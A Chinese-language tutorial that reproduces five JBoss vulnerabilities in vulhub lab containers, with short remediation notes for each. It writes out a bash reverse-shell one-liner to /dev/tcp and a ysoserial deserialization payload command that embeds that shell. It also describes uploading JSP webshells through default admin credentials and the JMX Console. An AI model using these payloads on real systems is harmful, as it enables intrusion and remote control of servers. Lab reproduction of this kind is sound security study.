Jboss漏洞复现（附带修复方法）

 JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可，可以在任何商业应⽤中 免费使⽤。JBoss是⼀个管理EJB的容器和服务器，⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼ 服务不包括⽀持servlet/JSP的WEB容器，⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域， JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发，并且由开源社区开发， 这使得JBoss⼴为流⾏。

3.1 CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞

      这是经典的JBoss反序列化漏洞，JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象， 然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码

漏洞复现

搭建环境命令如下

cd vulhub-master/jboss/JMXInvokerServlet-deserialization  
docker-compose up -d 

然后访问目标的/invoker/JMXInvokerServlet 目录会直接给我们下载，这说明接⼝开放，此接⼝存在反序列化漏洞

我们可以用工具ysoserial对其进行利用，下载链接https://github.com/frohoff/ysoserial

然后写一句fantanshell的语句，并将其进行base64编码，

bash -i >& /dev/tcp/ip/port 0>&1

在终端中运行我们下载的工具，命令如下

java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c 
{echo,编码后的反弹shell}|{base64,-d}|{bash,-i} 
">exp.ser

成功执行后开启我们服务器的监听端口 nc -lvvp 4444，然后执行如下命令

curl http://靶机IP:8080/invoker/JMXInvokerServlet --data-binary @exp.ser 

即可成功反弹到shell

漏洞修复

不使用invoker/JMXInvokerServlet的用户将其删除

3.2CVE-2017-7504

JBossMQ JMS 反序列化漏洞

      JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏ 任意代码执⾏

漏洞复现

搭建环境命令如下

cd vulhub-master/jboss/CVE-2017-7504  
docker-compose up -d 

访问目标的/jbossmq-httpil/HTTPServerILServlet目录进入如下页面，则该目标存在漏洞

然后利用jexboss工具获取shell，执行命令如下

python3 jexboss.py -u http://IP:8080/

然后就成功获取shell

漏洞修复

不用HTTPServerILServlet的用户将其删除

3.3.CVE-2017-12149

JBoss 5.x/6.x反序列化漏洞

      漏洞简述该漏洞为Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化，从⽽导致了漏洞

漏洞复现

先搭建环境，命令如下

cd vulhub-master/jboss/CVE-2017-12149  
docker-compose up -d 

进入环境后先右键检查jboss的版本

然后访问目录/invoker/readonly，如果出现500错误，则证明漏洞存在

接下来利用工具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可，工具下载链接

https://cdn.vulhub.org/deserialization/DeserializeExploit.jar

填入目标url后就可成功执行命令

漏洞修复

1.不需要 http-invoker.sar 组件的⽤户可直接删除此组件。

2.添加如下代码⾄ http-invoker.sar 下 web.xml 的 security-constraint 标签中，对 http invoker 组件 进⾏访问控制：

3.升级新版本。

3.4Administration Console弱⼝令

Administration Console管理⻚⾯存在弱⼝令，`admin:admin`，登陆后台上传war包 , getshell

漏洞复现

搭建环境命令如下，与3.3环境相同

cd vulhub-master/jboss/CVE-2017-12149  
docker-compose up -d 

访问到目标后我们直接访问他的/admin-console/login.seam?conversationId=4，会弹出一个登录框，这里是一个弱口令，账号为admin，密码为vulhub

登陆成功后点击web应用

然后上传一个test.war文件，这是一个war包，里面是名为1.jsp的一句话木马

上传成功后直接访问test/1.jsp，发现访问成功

然后用蚁剑连接

漏洞修复

修改为强密码

3.5低版本JMX Console未授权

低版本JMX Console未授权访问Getshell

       漏洞描述 此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放，并且没有任何身份验证机制，导 致攻击者可以进⼊到 jmx控制台，并在其中执⾏任何功能。

漏洞复现

先搭建环境

cd vulhub-master/jboss/CVE-2017-7504  
docker-compose up -d 

我们访问目标的/jmx-console/目录，这⾥我们使⽤得复现环境不存在，所以需要密码（正常环境⽆需密码直接可进⼊）账号密码为admin，admin

进去后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进 去（通过URL的⽅式远程部署）

然后找到⻚⾯中的void addURL() 选项，找那个paramtype为java,lang.string的

在ParamValue一栏填写一个远程war包的地址后点击invoke，出现如下界面时则上传成功

然后我们直接去访问上传的war包并用蚁剑连接，/test/test.jsp

修复方法

禁止用户上传文件

3.6⾼版本JMX Console未授权

       JMX Console默认存在未授权访问，直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war包 , getshell

漏洞复现

搭建环境命令如下

cd vulhub-master/jboss/CVE-2017-12149  
docker-compose up -d 

进入环境后访问目标的/jmx-console/目录，因为使⽤环境不存在该漏洞所以需要输⼊账户密码：admin，vulhub，进入如下页面

点击jboss system中的service=MainDeployer

点进去后往下滑，找deploy,如下，后面为jaba.net.URL的

然后与上面相同，填写一个远程部署war的url地址，然后点击invoke,上传第一次时会出现500，第二次上传就会正常显示

然后我们去访问test/test.jsp成功访问然后用蚁剑连接

修复方法

禁止用户上传文件